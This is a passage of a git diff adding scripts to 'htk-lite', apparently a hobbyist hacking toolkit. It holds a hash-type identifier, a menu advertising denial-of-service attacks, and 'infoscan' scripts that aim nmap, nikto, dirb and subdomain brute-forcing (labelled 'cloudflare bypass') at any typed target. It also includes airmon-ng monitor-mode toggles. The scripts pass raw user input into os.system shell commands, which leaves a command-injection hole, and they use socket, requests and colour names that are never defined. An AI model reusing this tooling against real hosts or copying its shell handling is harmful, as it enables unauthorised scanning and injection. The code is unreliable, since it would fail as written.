hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] + +hashid() diff --git a/htk-lite/commandlist/help.py b/htk-lite/commandlist/help.py new file mode 100644 index 0000000..5eda690 --- /dev/null +++ b/htk-lite/commandlist/help.py @@ -0,0 +1,69 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def helpbanner(): + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + print """ +╔══════════════════════════════════════════════════════════╗ +║ ║ +║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ +║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ +║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ +║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ +║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ +║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ +║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ +║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ +║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ +║ ║ +║══════════════════════════════════════════════════════════║ +║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m6\033[0m] ║ +║══════════════════════════════════════════════════════════════════════════════════════╗ +║ ? | this menu ║ +║ exit | exit htkl ║ +║ clear | clears screen ║ +║ banner | shows a banner ║ +║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ +║ dos | run Denial-Of-Service attacks ║ +║ ║ +║ ║ +║ \033[5m@tuf_unkn0wn\033[0m ║ +╚══════════════════════════════════════════════════════════════════════════════════════╝ + \033[0m\n""".format(b) +helpbanner() diff --git a/htk-lite/commandlist/infoscan-o.py b/htk-lite/commandlist/infoscan-o.py new file mode 100644 index 0000000..ef19d93 --- /dev/null +++ b/htk-lite/commandlist/infoscan-o.py @@ -0,0 +1,176 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True +specscan() diff --git a/htk-lite/commandlist/infoscan.py b/htk-lite/commandlist/infoscan.py new file mode 100644 index 0000000..7cab9a1 --- /dev/null +++ b/htk-lite/commandlist/infoscan.py @@ -0,0 +1,117 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def infoscan(): + try: + target = raw_input("\033[1mTarget:\033[0m ") + port = raw_input("\033[1mPort:\033[0m ") + print "\033[93m! HTTP OR HTTPS !\033[0m\n" + ht = raw_input("[https/http]: ") + if ht == "http": + targetht = 'http://' + if ht == "https": + targetht = 'https://' + print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" + os.system("curl {0}".format(target)) + print "\n" + ip = socket.gethostbyname(target) + print G+"------------------------\033[0m" + print N+"\033[1mHost:\033[32m ", target + print N+"\033[1mIP:\033[32m ", ip + print G+"------------------------\033[0m" + os.system("curl -I {0}".format(target)) + print "\n" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + exit() + print "\n" + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + print "\n" + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + print "\n" + os.system("wafw00f {0}".format(target)) + print "\n" + os.system("sslscan {0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + print "\n" + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + print "\033[0m" + print "\n" + os.system("nmap -A {0}".format(target)) + print "\n" + os.system("nmap --script dns-brute {0}".format(target)) + print "\n" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + print "\n" + os.system("nikto -h {0} -p {1}".format(target,port)) + print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" + except: + print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" +infoscan() diff --git a/htk-lite/commandlist/monitor-off.py b/htk-lite/commandlist/monitor-off.py new file mode 100644 index 0000000..33c8329 --- /dev/null +++ b/htk-lite/commandlist/monitor-off.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def monitoroff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +monitoroff() diff --git a/htk-lite/commandlist/monitor-on.py b/htk-lite/commandlist/monitor-on.py new file mode 100644 index 0000000..5893fea --- /dev/null +++ b/htk-lite/commandlist/monitor-on.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def monitoron(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +monitoron() diff --git a/htk-lite/commandlist/netscan.py b/htk-lite/commandlist/netscan.py new file mode 100644 index 0000000..d2e0783 --- /dev/null +++ b/htk-lite/commandlist/netscan.py @@ -0,0 +1,72 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit 